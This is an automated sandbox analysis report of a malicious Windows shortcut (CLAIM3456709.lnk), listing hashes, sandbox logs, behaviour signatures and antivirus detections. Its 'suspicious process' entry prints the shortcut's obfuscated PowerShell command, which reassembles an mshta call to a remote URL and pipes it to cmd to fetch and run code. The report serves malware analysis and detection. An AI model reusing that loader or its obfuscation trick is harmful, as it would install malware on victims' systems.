Errors

  • Failed to run the processing module "Static" for task #6144485: Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/cuckoo/core/plugins.py", line 250, in process data = current.run() File "/usr/local/lib/python2.7/dist-packages/cuckoo/processing/static.py", line 1608, in run static["lnk"] = LnkShortcut(f.file_path).run() File "/usr/local/lib/python2.7/dist-packages/cuckoo/processing/static.py", line 1088, in run ret["net_share"] = self.read_stringz(offset + off.net_volume + 20) File "/usr/local/lib/python2.7/dist-packages/cuckoo/processing/static.py", line 1044, in read_stringz return self.buf[offset:self.buf.index("\x00", offset)] ValueError: substring not found

    click to expand / collapse this error

File CLAIM3456709.lnk

Size 2.4KB
Type MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 22:21:00 1600, mtime=Sun Dec 31 22:21:00 1600, atime=Sun Dec 31 22:21:00 1600, length=0, window=hidenormalshowminimized
MD5 392a321b941ff0660fc4373965e1855f
SHA1 0688539b5ed7170f37b8f70eed5aa5f261270cd8
SHA256 623a80d99ea7eba61ece4b613de14032c1fb6506ad648da6f808cb197f01f7aa
SHA512
d6aa1cc445536c2e7d542dd079cd7ce29e4dc0967ac765511d54d4baa5dcef6dc3bfab571621c9ed5d95907f8f432944f02e803455a35e215b7a182b3af58504
CRC32 765C2741
ssdeep None
Yara
  • LnkHeader - (no description)
  • powershell - (no description)

Score

This file is very suspicious, with a score of 10 out of 10!

Please notice: The scoring system is currently still in development and should be considered an alpha feature.


Feedback

Expecting different results? Send us this analysis and we will inspect it. Click here

Information on Execution

Analysis
Category Started Completed Duration Routing Logs
FILE March 22, 2025, 1:19 a.m. March 22, 2025, 1:20 a.m. 59 seconds internet Show Analyzer Log
Show Cuckoo Log

Analyzer Log

2025-03-22 00:19:06,000 [analyzer] DEBUG: Starting analyzer from: C:\tmp4hzt0l
2025-03-22 00:19:06,015 [analyzer] DEBUG: Pipe server name: \??\PIPE\kZvNfoJanrzsMFBdrgMCJ
2025-03-22 00:19:06,015 [analyzer] DEBUG: Log pipe server name: \??\PIPE\oBmjFcFpydbAuJNPpcn
2025-03-22 00:19:06,280 [analyzer] DEBUG: Started auxiliary module Curtain
2025-03-22 00:19:06,280 [analyzer] DEBUG: Started auxiliary module DbgView
2025-03-22 00:19:06,750 [analyzer] DEBUG: Started auxiliary module Disguise
2025-03-22 00:19:06,937 [analyzer] DEBUG: Loaded monitor into process with pid 504
2025-03-22 00:19:06,937 [analyzer] DEBUG: Started auxiliary module DumpTLSMasterSecrets
2025-03-22 00:19:06,937 [analyzer] DEBUG: Started auxiliary module Human
2025-03-22 00:19:06,937 [analyzer] DEBUG: Started auxiliary module InstallCertificate
2025-03-22 00:19:06,937 [analyzer] DEBUG: Started auxiliary module Reboot
2025-03-22 00:19:07,030 [analyzer] DEBUG: Started auxiliary module RecentFiles
2025-03-22 00:19:07,030 [analyzer] DEBUG: Started auxiliary module Screenshots
2025-03-22 00:19:07,030 [analyzer] DEBUG: Started auxiliary module Sysmon
2025-03-22 00:19:07,030 [analyzer] DEBUG: Started auxiliary module LoadZer0m0n
2025-03-22 00:19:07,108 [lib.api.process] INFO: Successfully executed process from path 'C:\\Windows\\System32\\cmd.exe' with arguments ['/c', 'start', '/wait', '"aVrUm"', u'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\CLAIM3456709.lnk'] and pid 2612
2025-03-22 00:19:07,375 [analyzer] DEBUG: Loaded monitor into process with pid 2612
2025-03-22 00:19:07,842 [analyzer] CRITICAL: Error creating function stub for advapi32!ControlService.
2025-03-22 00:19:07,890 [analyzer] CRITICAL: Unable to change memory protection of advapi32!DeleteService at 0x09f498 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:07,921 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenSCManagerA at 0x09f336 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:07,921 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenSCManagerW at 0x09f4a8 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:07,921 [analyzer] CRITICAL: Error creating function stub for advapi32!OpenServiceA.
2025-03-22 00:19:07,937 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenServiceW at 0x09f488 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:07,937 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegCloseKey at 0x09f6b4 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:07,953 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegDeleteValueA at 0x09f5ee 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:07,967 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegDeleteValueW at 0x09f5dc 10 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,000 [analyzer] CRITICAL: Unable to change memory protection of advapi32!StartServiceCtrlDispatcherW at 0x09f276 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,000 [analyzer] CRITICAL: Error creating function stub for advapi32!StartServiceW.
2025-03-22 00:19:08,046 [analyzer] CRITICAL: Error creating function stub for advapi32!ControlService.
2025-03-22 00:19:08,046 [analyzer] CRITICAL: Unable to change memory protection of advapi32!DeleteService at 0x09f498 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,062 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenSCManagerA at 0x09f336 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,155 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenSCManagerW at 0x09f4a8 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,171 [analyzer] CRITICAL: Error creating function stub for advapi32!OpenServiceA.
2025-03-22 00:19:08,187 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenServiceW at 0x09f488 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,203 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegCloseKey at 0x09f6b4 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,203 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegDeleteValueA at 0x09f5ee 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,217 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegDeleteValueW at 0x09f5dc 10 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,217 [analyzer] CRITICAL: Unable to change memory protection of advapi32!StartServiceCtrlDispatcherW at 0x09f276 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,217 [analyzer] CRITICAL: Error creating function stub for advapi32!StartServiceW.
2025-03-22 00:19:08,608 [analyzer] CRITICAL: Error creating function stub for advapi32!ControlService.
2025-03-22 00:19:08,608 [analyzer] CRITICAL: Unable to change memory protection of advapi32!DeleteService at 0x09f498 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,625 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenSCManagerA at 0x09f336 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,625 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenSCManagerW at 0x09f4a8 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,625 [analyzer] CRITICAL: Error creating function stub for advapi32!OpenServiceA.
2025-03-22 00:19:08,625 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenServiceW at 0x09f488 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,640 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegCloseKey at 0x09f6b4 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,640 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegDeleteValueA at 0x09f5ee 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,640 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegDeleteValueW at 0x09f5dc 10 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,655 [analyzer] CRITICAL: Unable to change memory protection of advapi32!StartServiceCtrlDispatcherW at 0x09f276 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,655 [analyzer] CRITICAL: Error creating function stub for advapi32!StartServiceW.
2025-03-22 00:19:08,828 [analyzer] CRITICAL: Error creating function stub for advapi32!ControlService.
2025-03-22 00:19:08,828 [analyzer] CRITICAL: Unable to change memory protection of advapi32!DeleteService at 0x09f498 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,828 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenSCManagerA at 0x09f336 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,828 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenSCManagerW at 0x09f4a8 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,842 [analyzer] CRITICAL: Error creating function stub for advapi32!OpenServiceA.
2025-03-22 00:19:08,842 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenServiceW at 0x09f488 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,858 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegCloseKey at 0x09f6b4 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,858 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegDeleteValueA at 0x09f5ee 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,858 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegDeleteValueW at 0x09f5dc 10 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,858 [analyzer] CRITICAL: Unable to change memory protection of advapi32!StartServiceCtrlDispatcherW at 0x09f276 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:08,875 [analyzer] CRITICAL: Error creating function stub for advapi32!StartServiceW.
2025-03-22 00:19:21,640 [analyzer] CRITICAL: Error creating function stub for advapi32!ControlService.
2025-03-22 00:19:21,655 [analyzer] CRITICAL: Unable to change memory protection of advapi32!DeleteService at 0x09f498 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:21,655 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenSCManagerA at 0x09f336 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:21,671 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenSCManagerW at 0x09f4a8 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:21,687 [analyzer] CRITICAL: Error creating function stub for advapi32!OpenServiceA.
2025-03-22 00:19:21,687 [analyzer] CRITICAL: Unable to change memory protection of advapi32!OpenServiceW at 0x09f488 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:21,703 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegCloseKey at 0x09f6b4 5 to RWX (error code 0xc0000045)!
2025-03-22 00:19:21,703 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegDeleteValueA at 0x09f5ee 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:21,717 [analyzer] CRITICAL: Unable to change memory protection of advapi32!RegDeleteValueW at 0x09f5dc 10 to RWX (error code 0xc0000045)!
2025-03-22 00:19:21,717 [analyzer] CRITICAL: Unable to change memory protection of advapi32!StartServiceCtrlDispatcherW at 0x09f276 6 to RWX (error code 0xc0000045)!
2025-03-22 00:19:21,733 [analyzer] CRITICAL: Error creating function stub for advapi32!StartServiceW.
2025-03-22 00:19:59,881 [analyzer] INFO: Injected into process with pid 1784 and name u'powershell.exe'
2025-03-22 00:20:00,210 [lib.api.process] ERROR: Failed to dump memory of 64-bit process with pid 1784.
2025-03-22 00:20:00,490 [analyzer] DEBUG: Loaded monitor into process with pid 1784
2025-03-22 00:20:08,444 [analyzer] INFO: Analysis timeout hit, terminating analysis.
2025-03-22 00:20:08,648 [analyzer] INFO: Terminating remaining processes before shutdown.
2025-03-22 00:20:08,648 [lib.api.process] INFO: Successfully terminated process with pid 2612.
2025-03-22 00:20:08,648 [lib.api.process] INFO: Successfully terminated process with pid 1784.
2025-03-22 00:20:08,648 [analyzer] INFO: Analysis completed.

Cuckoo Log

2025-03-22 01:19:21,093 [cuckoo.core.scheduler] INFO: Task #6144485: acquired machine win7x6420 (label=win7x6420)
2025-03-22 01:19:21,093 [cuckoo.core.resultserver] DEBUG: Now tracking machine 192.168.168.220 for task #6144485
2025-03-22 01:19:21,502 [cuckoo.auxiliary.sniffer] INFO: Started sniffer with PID 1728487 (interface=vboxnet0, host=192.168.168.220)
2025-03-22 01:19:21,549 [cuckoo.machinery.virtualbox] DEBUG: Starting vm win7x6420
2025-03-22 01:19:22,104 [cuckoo.machinery.virtualbox] DEBUG: Restoring virtual machine win7x6420 to vmcloak
2025-03-22 01:19:30,930 [cuckoo.core.guest] INFO: Starting analysis #6144485 on guest (id=win7x6420, ip=192.168.168.220)
2025-03-22 01:19:31,935 [cuckoo.core.guest] DEBUG: win7x6420: not ready yet
2025-03-22 01:19:36,965 [cuckoo.core.guest] INFO: Guest is running Cuckoo Agent 0.10 (id=win7x6420, ip=192.168.168.220)
2025-03-22 01:19:37,043 [cuckoo.core.guest] DEBUG: Uploading analyzer to guest (id=win7x6420, ip=192.168.168.220, monitor=latest, size=6660546)
2025-03-22 01:19:38,248 [cuckoo.core.resultserver] DEBUG: Task #6144485: live log analysis.log initialized.
2025-03-22 01:19:39,144 [cuckoo.core.resultserver] DEBUG: Task #6144485 is sending a BSON stream
2025-03-22 01:19:39,505 [cuckoo.core.resultserver] DEBUG: Task #6144485 is sending a BSON stream
2025-03-22 01:19:40,447 [cuckoo.core.resultserver] DEBUG: Task #6144485: File upload for 'shots/0001.jpg'
2025-03-22 01:19:40,488 [cuckoo.core.resultserver] DEBUG: Task #6144485 uploaded file length: 110775
2025-03-22 01:19:52,830 [cuckoo.core.guest] DEBUG: win7x6420: analysis #6144485 still processing
2025-03-22 01:20:00,350 [cuckoo.core.resultserver] DEBUG: Task #6144485 is sending a BSON stream
2025-03-22 01:20:07,920 [cuckoo.core.guest] DEBUG: win7x6420: analysis #6144485 still processing
2025-03-22 01:20:08,567 [cuckoo.core.resultserver] DEBUG: Task #6144485: File upload for 'curtain/1742599208.57.curtain.log'
2025-03-22 01:20:08,574 [cuckoo.core.resultserver] DEBUG: Task #6144485 uploaded file length: 36
2025-03-22 01:20:08,641 [cuckoo.core.resultserver] DEBUG: Task #6144485: File upload for 'sysmon/1742599208.63.sysmon.xml'
2025-03-22 01:20:08,646 [cuckoo.core.resultserver] DEBUG: Task #6144485 uploaded file length: 204076
2025-03-22 01:20:09,443 [cuckoo.core.resultserver] DEBUG: Task #6144485: File upload for 'shots/0002.jpg'
2025-03-22 01:20:09,467 [cuckoo.core.resultserver] DEBUG: Task #6144485 uploaded file length: 133508
2025-03-22 01:20:09,486 [cuckoo.core.resultserver] DEBUG: Task #6144485 had connection reset for <Context for LOG>
2025-03-22 01:20:10,932 [cuckoo.core.guest] INFO: win7x6420: analysis completed successfully
2025-03-22 01:20:10,945 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Redsocks
2025-03-22 01:20:10,966 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Sniffer
2025-03-22 01:20:11,916 [cuckoo.machinery.virtualbox] INFO: Successfully generated memory dump for virtual machine with label win7x6420 to path /srv/cuckoo/cwd/storage/analyses/6144485/memory.dmp
2025-03-22 01:20:11,918 [cuckoo.machinery.virtualbox] DEBUG: Stopping vm win7x6420
2025-03-22 01:20:19,740 [cuckoo.core.resultserver] DEBUG: Stopped tracking machine 192.168.168.220 for task #6144485
2025-03-22 01:20:20,033 [cuckoo.core.scheduler] DEBUG: Released database task #6144485
2025-03-22 01:20:20,052 [cuckoo.core.scheduler] INFO: Task #6144485: analysis procedure completed

Signatures

Yara rules detected for file (2 events)
description (no description) rule LnkHeader
description (no description) rule powershell
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Creates a shortcut to an executable file (1 event)
file C:\Users\Administrator\AppData\Local\Temp\CLAIM3456709.lnk
Creates a suspicious process (1 event)
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Convert-String -E '1 2 3 4 5=34 5//2/1' -I '340.mp4 texasdispatchers.com msh ta https:' | cmd
Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)
Process injection Process 2612 resumed a thread in remote process 1784
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000254
suspend_count: 1
process_identifier: 1784
1 0 0
File has been identified by 8 AntiVirus engine on IRMA as malicious (8 events)
G Data Antivirus (Windows) Virus: Heur.BZC.YAX.Pantera.10.28AB6E6A (Engine A)
Avast Core Security (Linux) LNK:Agent-KJ [Trj]
Trend Micro SProtect (Linux) LNK_ARGULONG.SMLNK
eScan Antivirus (Linux) Heur.BZC.YAX.Pantera.10.28AB6E6A(DB)
ESET Security (Windows) LNK/Agent.WC trojan
Bitdefender Antivirus (Linux) Heur.BZC.YAX.Pantera.10.28AB6E6A
Kaspersky Standard (Windows) HEUR:Trojan.WinLNK.Powecod.a
Emsisoft Commandline Scanner (Windows) Trojan.PowerShell.Gen (A)
File has been identified by 22 AntiVirus engines on VirusTotal as malicious (22 events)
CTX lnk.unknown.pantera
VIPRE Heur.BZC.YAX.Pantera.10.28AB6E6A
Sangfor Trojan.Generic-LNK.Save.ea288cc4
Arcabit Heur.BZC.YAX.Pantera.10.28AB6E6A
Symantec Scr.Mallnk!gen10
ESET-NOD32 LNK/Agent.WC
TrendMicro-HouseCall LNK_ARGULONG.SMLNK
Avast LNK:Agent-KJ [Trj]
Kaspersky HEUR:Trojan.WinLNK.Powecod.a
BitDefender Heur.BZC.YAX.Pantera.10.28AB6E6A
MicroWorld-eScan Heur.BZC.YAX.Pantera.10.28AB6E6A
Emsisoft Trojan.PowerShell.Gen (A)
TrendMicro LNK_ARGULONG.SMLNK
FireEye Heur.BZC.YAX.Pantera.10.28AB6E6A
Google Detected
GData Heur.BZC.YAX.Pantera.10.28AB6E6A
VBA32 Trojan.Link.ShellCmd
Ikarus Trojan.SuspectCRC
Zoner Probably Heur.LNKScript
huorong Trojan/LNK.Agent.ba
Fortinet LNK/Agent.D!tr
AVG LNK:Agent-KJ [Trj]
Screenshots
Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action VT Location
No hosts contacted.
Cuckoo

We're processing your submission... This could take a few seconds.